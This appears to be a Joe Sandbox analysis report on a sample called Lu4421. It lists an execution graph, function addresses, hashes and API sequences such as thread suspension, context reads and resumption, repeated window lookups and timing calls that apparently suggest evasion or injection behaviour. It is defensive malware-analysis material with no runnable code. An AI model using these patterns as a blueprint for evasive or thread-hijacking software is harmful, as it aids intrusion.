                                                                                  execution_graph 7037 11b02bf 7038 11b0300 GetThreadContext 7037->7038 7048 11b03b6 7038->7048 7043 11b04ae 7056 11b04ec CloseHandle 7043->7056 7047 11b051a 7049 11b03d5 ResumeThread 7048->7049 7051 11b04ae 7049->7051 7052 11b04ec CloseHandle 7051->7052 7053 11b04e0 CloseHandle 7052->7053 7055 11b03a5 ResumeThread 7053->7055 7055->7043 7057 11b04e0 CloseHandle 7056->7057 7057->7047 7000 11b4f4e 7001 11b4f55 CloseHandle 7000->7001 7003 11b4fbd 7001->7003 7058 11ad2ef 7059 11ad2fb WaitForSingleObject 7058->7059 7060 11ad44a 7059->7060 6945 11abded 6948 11abe1b 6945->6948 6956 11abe45 WaitForSingleObject 6948->6956 6951 11abfd5 SleepEx 6953 11ac040 6951->6953 6953->6953 6962 11ac0a0 6953->6962 6955 11abe0e 6957 11abfd5 SleepEx 6956->6957 6959 11ac040 6957->6959 6959->6959 6960 11ac0a0 4 API calls 6959->6960 6961 11abe3d WaitForSingleObject 6960->6961 6961->6951 6963 11ac0f7 6962->6963 6964 11ac13d 6963->6964 6965 11ac3e7 SuspendThread 6963->6965 6964->6955 6967 11ac481 GetThreadContext 6965->6967 6969 11ac50c ResumeThread 6967->6969 6971 11ac67c CloseHandle 6969->6971 6973 11ac6ea 6971->6973 6973->6964 6935 124356c 6937 1243571 SleepEx FindWindowA 6935->6937 6938 12435f2 SleepEx FindWindowA 6937->6938 6939 12435ed 6937->6939 6938->6939 6940 124366b Sleep FindWindowA 6938->6940 6940->6939 6941 12436eb FindWindowA 6940->6941 6941->6939 6942 1243754 6941->6942 6942->6939 6943 1243761 FindWindowA 6942->6943 6943->6939 6944 12437b0 6943->6944 6944->6939 6990 11ac333 6992 11ac346 6990->6992 6991 11ac6ea 6991->6991 6992->6991 6993 11ac403 SuspendThread 6992->6993 6994 11ac481 GetThreadContext 6993->6994 6996 11ac50c ResumeThread 6994->6996 6998 11ac67c CloseHandle 6996->6998 6998->6991 7007 11af1a7 7009 11af1ac 7007->7009 7012 11af200 7009->7012 7011 11af1f6 7013 11af218 WaitForSingleObject 7012->7013 7015 11af243 7013->7015 7015->7011 7004 11aefb4 ResumeThread 7005 11aefd7 CloseHandle 7004->7005 7006 11af03b 7005->7006 7029 11aae84 7030 11aae8a SuspendThread 7029->7030 7032 11aafbc GetThreadContext 7030->7032 7034 11ab0ae ResumeThread CloseHandle 7032->7034 7036 11ab26f 7034->7036 6974 11a7365 6976 11a736a 6974->6976 6977 11a7388 6976->6977 6979 11a73b7 6976->6979 6977->6979 6984 11a740c 6977->6984 6980 11a7493 timeGetTime 6979->6980 6981 11a74bb SleepEx 6979->6981 6980->6981 6983 11a77f6 6981->6983 6985 11a7412 6984->6985 6986 11a7493 timeGetTime 6985->6986 6987 11a74bb SleepEx 6985->6987 6986->6987 6989 11a77f6 6987->6989 7016 11af5a5 7017 11af5b1 7016->7017 7018 11af64c OpenThread 7017->7018 7019 11af5d0 OpenThread 7017->7019 7022 11af6d0 7018->7022 7019->7022 7023 11af86f SuspendThread 7022->7023 7028 11afae5 7022->7028 7024 11af887 GetThreadContext 7023->7024 7026 11af94a ResumeThread CloseHandle 7024->7026 7026->7028

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B7FAB70 Relevance: .8, Instructions: 828COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6d564f92f17d68001168d13561cea39b316657d49fd0c6f5c74dd7f75425f985
                                                                                  • Instruction ID: a0580586c6a60056cf59f02c76e268092fd5c93a6298fe4a0cf8f141582da8da
                                                                                  • Opcode Fuzzy Hash: 6d564f92f17d68001168d13561cea39b316657d49fd0c6f5c74dd7f75425f985
                                                                                  • Instruction Fuzzy Hash: CF526831B0E78E4FD765DB7888656E97FE0EF45310F1902BAD499CB1A3CD28A906C781
                                                                                  Function 00007FFD9B7F7DA6 Relevance: .5, Instructions: 468COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a830a8a5429d2038d67d0396ad63ad22db1d7bc5532f333cb19d56a1309ea122
                                                                                  • Instruction ID: 97eed43d4f4d4417be36d96ca52aaecc9137a8f920a3bcd0b22f982fbce665a0
                                                                                  • Opcode Fuzzy Hash: a830a8a5429d2038d67d0396ad63ad22db1d7bc5532f333cb19d56a1309ea122
                                                                                  • Instruction Fuzzy Hash: 81F1A730609B8D8FEBA8DF28C855BE97BD1FF54300F44426EE85DC72A5CB3499418782
                                                                                  Function 00007FFD9B7F8B52 Relevance: .5, Instructions: 454COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0d08f080f5ff016937c9c93a99a9a13085f76eeebf7f98692fdf3abbc40951b8
                                                                                  • Instruction ID: cd414ab0b4d7744183236dec054b795cb95e59b15a06fc105b6a0e610705d153
                                                                                  • Opcode Fuzzy Hash: 0d08f080f5ff016937c9c93a99a9a13085f76eeebf7f98692fdf3abbc40951b8
                                                                                  • Instruction Fuzzy Hash: AEE1A330A09A8D8FEBA8DF28C8657E97BD1EF54310F14426ED84DC72A5CF7499458BC1
                                                                                  Function 01243571 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 131COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindSleepWindow
                                                                                  • String ID: EXPL$LASS$OW_C$WIND
                                                                                  • API String ID: 3078808852-207433289
                                                                                  • Opcode ID: 125ca1bcaa80b1564cb53e533dd46275c86e176e3d84fb49547779ef92419a5e
                                                                                  • Instruction ID: 1550f1f23954f5637f4d1eb0c93798282849d610cc8f9117768f74746b2b3a69
                                                                                  • Opcode Fuzzy Hash: 125ca1bcaa80b1564cb53e533dd46275c86e176e3d84fb49547779ef92419a5e
                                                                                  • Instruction Fuzzy Hash: 455192B7A18941DAEB28EF75E4427E87631E314758F508600CBB946ECDDB38D1AADF04
                                                                                  Function 00007FFD9B7F0955 Relevance: 10.6, Strings: 8, Instructions: 587COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (7+t$07+t$7+t[$@7+t$P7+t$`7+t$6+t$7+t
                                                                                  • API String ID: 0-1342028135
                                                                                  • Opcode ID: a2ce6ac52c63a45e7b6643f2763a2080ef4ef22e83a4dde36890dc968903a7dc
                                                                                  • Instruction ID: a9960b789598747a8b93ec8831c004193c3d00aa983ccce7037c2dd134aa8090
                                                                                  • Opcode Fuzzy Hash: a2ce6ac52c63a45e7b6643f2763a2080ef4ef22e83a4dde36890dc968903a7dc
                                                                                  • Instruction Fuzzy Hash: FD229E3190E3858FC766CF7884A54857FE0EF0236472505EED881EF2B3D66DA889C726
                                                                                  Function 00007FFD9B7FAFCD Relevance: 7.0, Strings: 5, Instructions: 703COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 60 7ffd9b7fafcd-7ffd9b7faffd 61 7ffd9b7fb017-7ffd9b7fb070 call 7ffd9b7f0630 60->61 62 7ffd9b7fafff-7ffd9b7fb013 60->62 71 7ffd9b7fb072-7ffd9b7fb089 call 7ffd9b7fa3d0 call 7ffd9b7f0720 61->71 72 7ffd9b7fb08e-7ffd9b7fb0c1 call 7ffd9b7f0660 61->72 62->61 71->72 80 7ffd9b7fb0c9-7ffd9b7fb10d 72->80 81 7ffd9b7fb0c3-7ffd9b7fb0c8 72->81 87 7ffd9b7fb116-7ffd9b7fb11f 80->87 88 7ffd9b7fb10f-7ffd9b7fb111 call 7ffd9b7fa250 80->88 81->80 90 7ffd9b7fb120-7ffd9b7fb182 87->90 88->87 90->90 91 7ffd9b7fb184-7ffd9b7fb19d call 7ffd9b7fa3d0 call 7ffd9b7f0720 90->91 96 7ffd9b7fb1a0-7ffd9b7fb1bd 91->96 98 7ffd9b7fb1c4 call 7ffd9b7fa1e0 96->98 99 7ffd9b7fb1bf call 7ffd9b7f2490 96->99 102 7ffd9b7fb1c9-7ffd9b7fb1de call 7ffd9b7f0788 98->102 99->98 106 7ffd9b7fb237-7ffd9b7fb25e call 7ffd9b7f9ae0 102->106 107 7ffd9b7fb1e0-7ffd9b7fb1e3 102->107 120 7ffd9b7fb657-7ffd9b7fb669 106->120 108 7ffd9b7fb1e5-7ffd9b7fb1f4 107->108 109 7ffd9b7fb264 107->109 110 7ffd9b7fb265-7ffd9b7fb27a 108->110 111 7ffd9b7fb1f6-7ffd9b7fb1fa 108->111 109->110 114 7ffd9b7fb27b-7ffd9b7fb283 110->114 113 7ffd9b7fb1fc-7ffd9b7fb208 111->113 111->114 117 7ffd9b7fb20a-7ffd9b7fb213 113->117 118 7ffd9b7fb219-7ffd9b7fb234 113->118 125 7ffd9b7fb2dc-7ffd9b7fb2ec 114->125 126 7ffd9b7fb285-7ffd9b7fb288 114->126 117->96 122 7ffd9b7fb215-7ffd9b7fb218 117->122 118->106 123 7ffd9b7fb66b-7ffd9b7fb6b1 120->123 124 7ffd9b7fb6b3-7ffd9b7fb6b7 120->124 123->124 129 7ffd9b7fb356-7ffd9b7fb367 125->129 130 7ffd9b7fb2ee-7ffd9b7fb302 125->130 127 7ffd9b7fb28a-7ffd9b7fb291 126->127 128 7ffd9b7fb309-7ffd9b7fb32d 126->128 127->125 128->129 131 7ffd9b7fb369 129->131 132 7ffd9b7fb36e-7ffd9b7fb390 call 7ffd9b7f0808 call 7ffd9b7f07a8 129->132 130->128 131->132 139 7ffd9b7fb3e9-7ffd9b7fb3f0 132->139 140 7ffd9b7fb392-7ffd9b7fb395 132->140 146 7ffd9b7fb3f4-7ffd9b7fb412 call 7ffd9b7faa10 139->146 141 7ffd9b7fb397-7ffd9b7fb3a6 140->141 142 7ffd9b7fb416 140->142 143 7ffd9b7fb417-7ffd9b7fb426 141->143 144 7ffd9b7fb3a8-7ffd9b7fb3ab 141->144 142->143 147 7ffd9b7fb427-7ffd9b7fb437 143->147 144->147 148 7ffd9b7fb3ad 144->148 146->120 156 7ffd9b7fb439-7ffd9b7fb43c 147->156 157 7ffd9b7fb490-7ffd9b7fb4ab 147->157 148->146 151 7ffd9b7fb3af-7ffd9b7fb3cf 148->151 154 7ffd9b7fb44a-7ffd9b7fb45b 151->154 155 7ffd9b7fb3d1-7ffd9b7fb3e8 151->155 158 7ffd9b7fb462-7ffd9b7fb483 154->158 159 7ffd9b7fb45d 154->159 155->139 160 7ffd9b7fb43e-7ffd9b7fb445 156->160 161 7ffd9b7fb4bd-7ffd9b7fb4bf 156->161 168 7ffd9b7fb524-7ffd9b7fb545 157->168 169 7ffd9b7fb4ad-7ffd9b7fb4bc 157->169 166 7ffd9b7fb48a-7ffd9b7fb48b 158->166 167 7ffd9b7fb485 call 7ffd9b7f06b8 158->167 159->158 160->154 164 7ffd9b7fb51c-7ffd9b7fb520 161->164 165 7ffd9b7fb4c1-7ffd9b7fb4ce 161->165 164->168 165->168 174 7ffd9b7fb4d0-7ffd9b7fb4d7 165->174 166->157 167->166 175 7ffd9b7fb547-7ffd9b7fb55f 168->175 176 7ffd9b7fb566-7ffd9b7fb56e 168->176 169->161 174->168 177 7ffd9b7fb4d9-7ffd9b7fb51b call 7ffd9b7fa3d0 174->177 175->176 178 7ffd9b7fb595-7ffd9b7fb59e 176->178 179 7ffd9b7fb570-7ffd9b7fb580 176->179 177->164 182 7ffd9b7fb5c7-7ffd9b7fb5ea 178->182 183 7ffd9b7fb5a0-7ffd9b7fb5b1 178->183 179->178 188 7ffd9b7fb582-7ffd9b7fb58b 179->188 190 7ffd9b7fb5ec-7ffd9b7fb608 call 7ffd9b7fa3d0 call 7ffd9b7f0720 182->190 191 7ffd9b7fb609-7ffd9b7fb651 182->191 183->182 189 7ffd9b7fb5b3-7ffd9b7fb5bd 183->189 188->178 189->182 190->191 191->120
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ([+t$0[+t$@\+t$@\+t$Z+t
                                                                                  • API String ID: 0-3153613545
                                                                                  • Opcode ID: 5fe7cd95b87cdc93f6544f669951fcb90a413a16af6f352fa357797c09c31a15
                                                                                  • Instruction ID: 4d2675e79d5a2ed16ee849e50ee31574c6c4c446b9abf6447116cf3d32754e19
                                                                                  • Opcode Fuzzy Hash: 5fe7cd95b87cdc93f6544f669951fcb90a413a16af6f352fa357797c09c31a15
                                                                                  • Instruction Fuzzy Hash: F4424730A0D78E8FDB95DF68C460AE97FE1FF45310F1502A9D449CB2B6CA38A946C791
                                                                                  Function 00007FFD9B7F0A26 Relevance: 6.6, Strings: 5, Instructions: 303COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (7+t$07+t$4M_H$@7+t$6+t
                                                                                  • API String ID: 0-1803259142
                                                                                  • Opcode ID: d23b926127cd3214efdaf8a6a3a2496e73f5fd1ccfea080f0313edb5fb0153fc
                                                                                  • Instruction ID: f85ad8f1fff652b2adf2d37393d1c0ef44978babc6b678a5693a30dfb606563f
                                                                                  • Opcode Fuzzy Hash: d23b926127cd3214efdaf8a6a3a2496e73f5fd1ccfea080f0313edb5fb0153fc
                                                                                  • Instruction Fuzzy Hash: 48C16D3194E7859FC766CF7884A54857FE0EF0237432904DEC881AF2B3D16D9899CB6A
                                                                                  Function 00007FFD9B7FED11 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t$x6+t$x6+t
                                                                                  • API String ID: 0-1823284
                                                                                  • Opcode ID: 9ccc2a6a8efdec30bc1618ac4005b70c2a4c66b6317cd65de3b68464f2da3920
                                                                                  • Instruction ID: dd55d5a52e87d66c24d88cfc4944fec66eb9983f28c96cab2187367fe4d3ac7b
                                                                                  • Opcode Fuzzy Hash: 9ccc2a6a8efdec30bc1618ac4005b70c2a4c66b6317cd65de3b68464f2da3920
                                                                                  • Instruction Fuzzy Hash: 27C13630B0AA4D8FE761EBB894656B97BE1EF49310F5105BAD44DCB1F2DE2CA901C345
                                                                                  Function 00007FFD9B7FEF05 Relevance: 4.0, Strings: 3, Instructions: 235COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: x6+t$x6+t$x6+t
                                                                                  • API String ID: 0-1823284
                                                                                  • Opcode ID: 4f276ae4d5613a37b4e660b0a20d2bacf97715df18fb96dd63941921aff3239c
                                                                                  • Instruction ID: 562cb07c8505e357cd04066d0dc32bb8975e56e2d577a0e3d13fc72a75781629
                                                                                  • Opcode Fuzzy Hash: 4f276ae4d5613a37b4e660b0a20d2bacf97715df18fb96dd63941921aff3239c
                                                                                  • Instruction Fuzzy Hash: 2881D630B0F74A5FE7619BB494615BA7BD1AF49210F5106BAD84ECB1F2DE2CA901C385
                                                                                  Function 00007FFD9B7F3E2F Relevance: 3.8, Strings: 3, Instructions: 91COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 403 7ffd9b7f3e2f-7ffd9b7f3e57 call 7ffd9b7f2630 409 7ffd9b7f3e5f-7ffd9b7f3e97 403->409 413 7ffd9b7f3e9b 409->413 414 7ffd9b7f3e9c-7ffd9b7f3eb3 413->414 415 7ffd9b7f3ef8-7ffd9b7f3f11 413->415 414->413 419 7ffd9b7f3eb5-7ffd9b7f3ef6 414->419 419->415
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: H$x6+t$x\+t
                                                                                  • API String ID: 0-3390991685
                                                                                  • Opcode ID: 16fb27ed45652afa00ef8f17e9075d47fe938b9d8535b8e34ca83049fbaef59b
                                                                                  • Instruction ID: fe2449ea916ea6cabc9415864cb5a539cfddf12cec45ff01ef6cc7a3900d6848
                                                                                  • Opcode Fuzzy Hash: 16fb27ed45652afa00ef8f17e9075d47fe938b9d8535b8e34ca83049fbaef59b
                                                                                  • Instruction Fuzzy Hash: E6314931B0AA8D4FE3A5EBBC84696683BD1EF45364B4601F9D409CB1F6DD2CAC45C341
                                                                                  Function 011A736A Relevance: 3.1, APIs: 2, Instructions: 128timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 422 11a736a-11a7382 423 11a7388-11a73b1 422->423 424 11a7431-11a7434 422->424 428 11a73f2-11a7402 call 11a740c 423->428 429 11a73b7-11a73c0 423->429 426 11a743a-11a743b 424->426 427 11a743c-11a743f 424->427 426->427 430 11a74bb-11a773d 427->430 431 11a7445-11a744c 427->431 442 11a7407-11a740b 428->442 433 11a73c6-11a73cc 429->433 434 11a73d7-11a73e1 429->434 439 11a774b-11a7758 430->439 440 11a7743-11a774a 430->440 436 11a7457-11a747d 431->436 441 11a73e7 433->441 434->441 437 11a7493-11a74b5 timeGetTime 436->437 438 11a7483 436->438 437->430 438->437 445 11a775e 439->445 446 11a776c-11a7788 439->446 440->439 447 11a7412-11a742b 441->447 443 11a740d-11a7411 442->443 444 11a7455 442->444 443->447 444->436 445->446 449 11a779a-11a779e 446->449 450 11a778e 446->450 447->424 452 11a77aa-11a77ec SleepEx 449->452 453 11a77a4 449->453 450->449 451 11a7794 450->451 451->449 455 11a77f6-11a782f 452->455 453->452 458 11a7844-11a787d call 11a7882 455->458 459 11a7835 455->459 459->458
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: SleepTimetime
                                                                                  • String ID:
                                                                                  • API String ID: 346578373-0
                                                                                  • Opcode ID: 090d97d67e3c56b24820089e1cd17dbf888febfd5d525ee4b01d114f06f5c147
                                                                                  • Instruction ID: 7135520c292c0d08bdbfbc9dbc8cf056dd6601c8d0d0d2f780b7a9990a29d38b
                                                                                  • Opcode Fuzzy Hash: 090d97d67e3c56b24820089e1cd17dbf888febfd5d525ee4b01d114f06f5c147
                                                                                  • Instruction Fuzzy Hash: 3E5188BB9096008FC72D9F78C4456E93FA1E744328BC64D24CE1127A8DD7367A62CB85
                                                                                  Function 011A740C Relevance: 3.1, APIs: 2, Instructions: 102timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 463 11a740c-11a7434 466 11a743a-11a743b 463->466 467 11a743c-11a743f 463->467 466->467 468 11a74bb-11a773d 467->468 469 11a7445-11a747d 467->469 474 11a774b-11a7758 468->474 475 11a7743-11a774a 468->475 472 11a7493-11a74b5 timeGetTime 469->472 473 11a7483 469->473 472->468 473->472 476 11a775e 474->476 477 11a776c-11a7788 474->477 475->474 476->477 479 11a779a-11a779e 477->479 480 11a778e 477->480 482 11a77aa-11a77ec SleepEx 479->482 483 11a77a4 479->483 480->479 481 11a7794 480->481 481->479 485 11a77f6-11a782f 482->485 483->482 488 11a7844-11a787d call 11a7882 485->488 489 11a7835 485->489 489->488
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: SleepTimetime
                                                                                  • String ID:
                                                                                  • API String ID: 346578373-0
                                                                                  • Opcode ID: b6457df68ec6d91ed59d39b5697c4dfd6b51adb8db36e3446653ec0fd3fda6b1
                                                                                  • Instruction ID: 96ee9fb60ed9000f9f40a27379a333f9f69517ff4b155e667415126425f20a27
                                                                                  • Opcode Fuzzy Hash: b6457df68ec6d91ed59d39b5697c4dfd6b51adb8db36e3446653ec0fd3fda6b1
                                                                                  • Instruction Fuzzy Hash: 43419ABB9096008F872D9F7884055E93FE5E304728BCA8D24CE1567A8DD7363A62CB85
                                                                                  Function 011ABE1B Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 493 11abe1b-11ac00d call 11abe45 WaitForSingleObject 497 11ac019-11ac03a SleepEx 493->497 498 11ac013 493->498 500 11ac040-11ac06f 497->500 498->497 501 11ac07a-11ac084 500->501 502 11ac075-11ac079 500->502 501->501 503 11ac086-11ac09b call 11ac0a0 501->503 502->501
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 309074506-0
                                                                                  • Opcode ID: 726eadb62ccc044848f59cd1cf475f8bfa6f36173a17184133caf1c8c52354c0
                                                                                  • Instruction ID: dfd2280be4ccae8e012c83875dae1d6d22ebe84f236864deb653610e19c50289
                                                                                  • Opcode Fuzzy Hash: 726eadb62ccc044848f59cd1cf475f8bfa6f36173a17184133caf1c8c52354c0
                                                                                  • Instruction Fuzzy Hash: 0231BCBBA045008FD728CF34D9026DD37A2E79977CB994E14CB2217B9DDA3864619B80
                                                                                  Function 011ABE45 Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 506 11abe45-11ac00d WaitForSingleObject 508 11ac019-11ac06f SleepEx 506->508 509 11ac013 506->509 512 11ac07a-11ac084 508->512 513 11ac075-11ac079 508->513 509->508 512->512 514 11ac086-11ac09b call 11ac0a0 512->514 513->512
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleSleepWait
                                                                                  • String ID:
                                                                                  • API String ID: 309074506-0
